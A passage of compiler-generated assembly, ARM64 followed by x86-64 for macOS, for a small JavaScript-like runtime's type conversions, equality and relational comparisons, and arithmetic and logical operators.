ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB13_2
b LBB13_1
LBB13_1:
ldr q0, [sp, #16]
stur q0, [x29, #-16]
b LBB13_3
LBB13_2:
ldr q0, [sp, #32]
stur q0, [x29, #-16]
b LBB13_3
LBB13_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _jsOR ; -- Begin function jsOR
.p2align 2
_jsOR: ; @jsOR
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #32]
str x1, [sp, #40]
str x2, [sp, #16]
str x3, [sp, #24]
ldr x0, [sp, #32]
ldr x1, [sp, #40]
bl _ToBoolean
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB14_2
b LBB14_1
LBB14_1:
ldr q0, [sp, #32]
stur q0, [x29, #-16]
b LBB14_3
LBB14_2:
ldr q0, [sp, #16]
stur q0, [x29, #-16]
b LBB14_3
LBB14_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _jsNOT ; -- Begin function jsNOT
.p2align 2
_jsNOT: ; @jsNOT
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #24]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
bl _ToBoolean
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB15_2
b LBB15_1
LBB15_1:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB15_3
LBB15_2:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB15_3
LBB15_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _jsSEQU ; -- Begin function jsSEQU
.p2align 2
_jsSEQU: ; @jsSEQU
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #24]
str x2, [sp]
str x3, [sp, #8]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldr x2, [sp]
ldr x3, [sp, #8]
bl _StrictEqualityComparison
stur x0, [x29, #-16]
stur x1, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _jsSNEQ ; -- Begin function jsSNEQ
.p2align 2
_jsSNEQ: ; @jsSNEQ
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #32]
str x1, [sp, #40]
str x2, [sp, #16]
str x3, [sp, #24]
ldr x0, [sp, #32]
ldr x1, [sp, #40]
ldr x2, [sp, #16]
ldr x3, [sp, #24]
bl _StrictEqualityComparison
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB17_2
b LBB17_1
LBB17_1:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB17_3
LBB17_2:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB17_3
LBB17_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _jsEQU ; -- Begin function jsEQU
.p2align 2
_jsEQU: ; @jsEQU
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #24]
str x2, [sp]
str x3, [sp, #8]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldr x2, [sp]
ldr x3, [sp, #8]
bl _AbstractEqualityComparison
stur x0, [x29, #-16]
stur x1, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _jsNEQ ; -- Begin function jsNEQ
.p2align 2
_jsNEQ: ; @jsNEQ
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #32]
str x1, [sp, #40]
str x2, [sp, #16]
str x3, [sp, #24]
ldr x0, [sp, #32]
ldr x1, [sp, #40]
ldr x2, [sp, #16]
ldr x3, [sp, #24]
bl _AbstractEqualityComparison
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB19_2
b LBB19_1
LBB19_1:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB19_3
LBB19_2:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB19_3
LBB19_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _jsLT ; -- Begin function jsLT
.p2align 2
_jsLT: ; @jsLT
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #24]
str x2, [sp]
str x3, [sp, #8]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldr x2, [sp]
ldr x3, [sp, #8]
bl _AbstractRelationalComparison
stur x0, [x29, #-16]
stur x1, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _jsGT ; -- Begin function jsGT
.p2align 2
_jsGT: ; @jsGT
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #16]
str x1, [sp, #24]
str x2, [sp]
str x3, [sp, #8]
ldr x0, [sp]
ldr x1, [sp, #8]
ldr x2, [sp, #16]
ldr x3, [sp, #24]
bl _AbstractRelationalComparison
stur x0, [x29, #-16]
stur x1, [x29, #-8]
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _jsLE ; -- Begin function jsLE
.p2align 2
_jsLE: ; @jsLE
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #32]
str x1, [sp, #40]
str x2, [sp, #16]
str x3, [sp, #24]
ldr x0, [sp, #16]
ldr x1, [sp, #24]
ldr x2, [sp, #32]
ldr x3, [sp, #40]
bl _AbstractRelationalComparison
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB22_2
b LBB22_1
LBB22_1:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB22_3
LBB22_2:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB22_3
LBB22_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _jsGE ; -- Begin function jsGE
.p2align 2
_jsGE: ; @jsGE
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #32]
str x1, [sp, #40]
str x2, [sp, #16]
str x3, [sp, #24]
ldr x0, [sp, #32]
ldr x1, [sp, #40]
ldr x2, [sp, #16]
ldr x3, [sp, #24]
bl _AbstractRelationalComparison
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB23_2
b LBB23_1
LBB23_1:
mov w8, #1
stur w8, [x29, #-16]
stur xzr, [x29, #-8]
b LBB23_3
LBB23_2:
mov w8, #1
stur w8, [x29, #-16]
mov x8, #1
stur x8, [x29, #-8]
b LBB23_3
LBB23_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _jsTER ; -- Begin function jsTER
.p2align 2
_jsTER: ; @jsTER
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-32]
stur x1, [x29, #-24]
str x2, [sp, #32]
str x3, [sp, #40]
str x4, [sp, #16]
str x5, [sp, #24]
ldur x0, [x29, #-32]
ldur x1, [x29, #-24]
bl _ToBoolean
str x0, [sp]
str x1, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB24_2
b LBB24_1
LBB24_1:
ldr q0, [sp, #32]
stur q0, [x29, #-16]
b LBB24_3
LBB24_2:
ldr q0, [sp, #16]
stur q0, [x29, #-16]
b LBB24_3
LBB24_3:
ldur x0, [x29, #-16]
ldur x1, [x29, #-8]
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _ToBoolean ## -- Begin function ToBoolean
.p2align 4, 0x90
_ToBoolean: ## @ToBoolean
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
cmpl $1, -32(%rbp)
jne LBB0_2
## %bb.1:
movq -32(%rbp), %rax
movq %rax, -16(%rbp)
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB0_12
LBB0_2:
cmpl $2, -32(%rbp)
jne LBB0_4
## %bb.3:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB0_11
LBB0_4:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
xorps %xmm1, %xmm1
ucomisd %xmm1, %xmm0
jne LBB0_6
jp LBB0_6
## %bb.5:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB0_10
LBB0_6:
movq -24(%rbp), %rax
shrq $48, %rax
andq $1, %rax
cmpq $0, %rax
je LBB0_8
## %bb.7:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB0_9
LBB0_8:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
LBB0_9:
jmp LBB0_10
LBB0_10:
jmp LBB0_11
LBB0_11:
jmp LBB0_12
LBB0_12:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function ToNumber
LCPI1_0:
.quad 0x3ff0000000000000 ## double 1
LCPI1_1:
.quad 0x7ff8000000000000 ## double NaN
.section __TEXT,__text,regular,pure_instructions
.globl _ToNumber
.p2align 4, 0x90
_ToNumber: ## @ToNumber
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
cmpl $0, -32(%rbp)
jne LBB1_2
## %bb.1:
movq -32(%rbp), %rax
movq %rax, -16(%rbp)
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB1_9
LBB1_2:
cmpl $2, -32(%rbp)
jne LBB1_4
## %bb.3:
movl $0, -16(%rbp)
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -8(%rbp)
jmp LBB1_8
LBB1_4:
cmpq $0, -24(%rbp)
je LBB1_6
## %bb.5:
movl $0, -16(%rbp)
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -8(%rbp)
jmp LBB1_7
LBB1_6:
movl $0, -16(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -8(%rbp)
LBB1_7:
jmp LBB1_8
LBB1_8:
jmp LBB1_9
LBB1_9:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _ToNumeric ## -- Begin function ToNumeric
.p2align 4, 0x90
_ToNumeric: ## @ToNumeric
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumber
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _StrictEqualityComparison ## -- Begin function StrictEqualityComparison
.p2align 4, 0x90
_StrictEqualityComparison: ## @StrictEqualityComparison
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %eax
cmpl -48(%rbp), %eax
je LBB3_2
## %bb.1:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
jmp LBB3_17
LBB3_2:
cmpl $0, -32(%rbp)
jne LBB3_7
## %bb.3:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
ucomisd -40(%rbp), %xmm0
jne LBB3_5
jp LBB3_5
## %bb.4:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
jmp LBB3_6
LBB3_5:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
LBB3_6:
jmp LBB3_17
LBB3_7:
cmpl $2, -32(%rbp)
jne LBB3_9
## %bb.8:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
jmp LBB3_17
LBB3_9:
cmpl $1, -32(%rbp)
jne LBB3_17
## %bb.10:
cmpq $0, -24(%rbp)
jne LBB3_12
## %bb.11:
cmpq $0, -40(%rbp)
je LBB3_14
LBB3_12:
cmpq $0, -24(%rbp)
je LBB3_15
## %bb.13:
cmpq $0, -40(%rbp)
je LBB3_15
LBB3_14:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
jmp LBB3_16
LBB3_15:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
LBB3_16:
jmp LBB3_17
LBB3_17:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _AbstractEqualityComparison ## -- Begin function AbstractEqualityComparison
.p2align 4, 0x90
_AbstractEqualityComparison: ## @AbstractEqualityComparison
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %eax
cmpl -48(%rbp), %eax
jne LBB4_2
## %bb.1:
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
movl -48(%rbp), %edx
movq -40(%rbp), %rcx
callq _StrictEqualityComparison
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
jmp LBB4_13
LBB4_2:
cmpl $1, -32(%rbp)
jne LBB4_7
## %bb.3:
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumber
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
ucomisd -40(%rbp), %xmm0
jne LBB4_5
jp LBB4_5
## %bb.4:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
jmp LBB4_6
LBB4_5:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
LBB4_6:
jmp LBB4_13
LBB4_7:
cmpl $1, -48(%rbp)
jne LBB4_12
## %bb.8:
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumber
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
ucomisd -24(%rbp), %xmm0
jne LBB4_10
jp LBB4_10
## %bb.9:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
jmp LBB4_11
LBB4_10:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
LBB4_11:
jmp LBB4_13
LBB4_12:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
LBB4_13:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _AbstractRelationalComparison ## -- Begin function AbstractRelationalComparison
.p2align 4, 0x90
_AbstractRelationalComparison: ## @AbstractRelationalComparison
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -88(%rbp) ## 8-byte Spill
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumeric
movsd -88(%rbp), %xmm1 ## 8-byte Reload
## xmm1 = mem[0],zero
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
movsd -72(%rbp), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
jbe LBB5_2
## %bb.1:
movl $1, -16(%rbp)
movq $1, -8(%rbp)
jmp LBB5_3
LBB5_2:
movl $1, -16(%rbp)
movq $0, -8(%rbp)
LBB5_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsADD ## -- Begin function jsADD
.p2align 4, 0x90
_jsADD: ## @jsADD
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl $0, -16(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -88(%rbp) ## 8-byte Spill
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumeric
movsd -88(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
movsd -72(%rbp), %xmm1 ## xmm1 = mem[0],zero
addsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsSUB ## -- Begin function jsSUB
.p2align 4, 0x90
_jsSUB: ## @jsSUB
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl $0, -16(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -88(%rbp) ## 8-byte Spill
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumeric
movsd -88(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
movsd -72(%rbp), %xmm1 ## xmm1 = mem[0],zero
subsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsMUL ## -- Begin function jsMUL
.p2align 4, 0x90
_jsMUL: ## @jsMUL
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl $0, -16(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -88(%rbp) ## 8-byte Spill
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumeric
movsd -88(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
movsd -72(%rbp), %xmm1 ## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsDIV ## -- Begin function jsDIV
.p2align 4, 0x90
_jsDIV: ## @jsDIV
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl $0, -16(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -88(%rbp) ## 8-byte Spill
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumeric
movsd -88(%rbp), %xmm0 ## 8-byte Reload
## xmm0 = mem[0],zero
movl %eax, -80(%rbp)
movq %rdx, -72(%rbp)
movsd -72(%rbp), %xmm1 ## xmm1 = mem[0],zero
divsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsMOD ## -- Begin function jsMOD
.p2align 4, 0x90
_jsMOD: ## @jsMOD
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -72(%rbp)
movq %rdx, -64(%rbp)
movsd -64(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -56(%rbp)
movl -48(%rbp), %edi
movq -40(%rbp), %rsi
callq _ToNumeric
movl %eax, -96(%rbp)
movq %rdx, -88(%rbp)
movsd -88(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -80(%rbp)
movl $0, -16(%rbp)
movsd -56(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd -80(%rbp), %xmm2 ## xmm2 = mem[0],zero
movaps %xmm0, %xmm1
divsd %xmm2, %xmm1
cvttsd2si %xmm1, %rax
cvtsi2sd %rax, %xmm1
mulsd %xmm2, %xmm1
subsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $96, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsPOS ## -- Begin function jsPOS
.p2align 4, 0x90
_jsPOS: ## @jsPOS
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumber
movl %eax, -16(%rbp)
movq %rdx, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__literal16,16byte_literals
.p2align 4 ## -- Begin function jsNEG
LCPI12_0:
.quad 0x8000000000000000 ## double -0
.quad 0x8000000000000000 ## double -0
.section __TEXT,__text,regular,pure_instructions
.globl _jsNEG
.p2align 4, 0x90
_jsNEG: ## @jsNEG
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl $0, -16(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToNumeric
movl %eax, -48(%rbp)
movq %rdx, -40(%rbp)
movaps LCPI12_0(%rip), %xmm1 ## xmm1 = [-0.0E+0,-0.0E+0]
movsd -40(%rbp), %xmm0 ## xmm0 = mem[0],zero
pxor %xmm1, %xmm0
movlpd %xmm0, -8(%rbp)
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsAND ## -- Begin function jsAND
.p2align 4, 0x90
_jsAND: ## @jsAND
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToBoolean
movl %eax, -64(%rbp)
movq %rdx, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB13_2
## %bb.1:
movq -48(%rbp), %rax
movq %rax, -16(%rbp)
movq -40(%rbp), %rax
movq %rax, -8(%rbp)
jmp LBB13_3
LBB13_2:
movq -32(%rbp), %rax
movq %rax, -16(%rbp)
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
LBB13_3:
movl -16(%rbp), %eax
movq -8(%rbp), %rdx
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _jsOR ## -- Begin function jsOR
.p2align 4, 0x90
_jsOR: ## @jsOR
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl %edi, -32(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -48(%rbp)
movq %rcx, -40(%rbp)
movl -32(%rbp), %edi
movq -24(%rbp), %rsi
callq _ToBoolean
movl %eax, -64(%rbp)
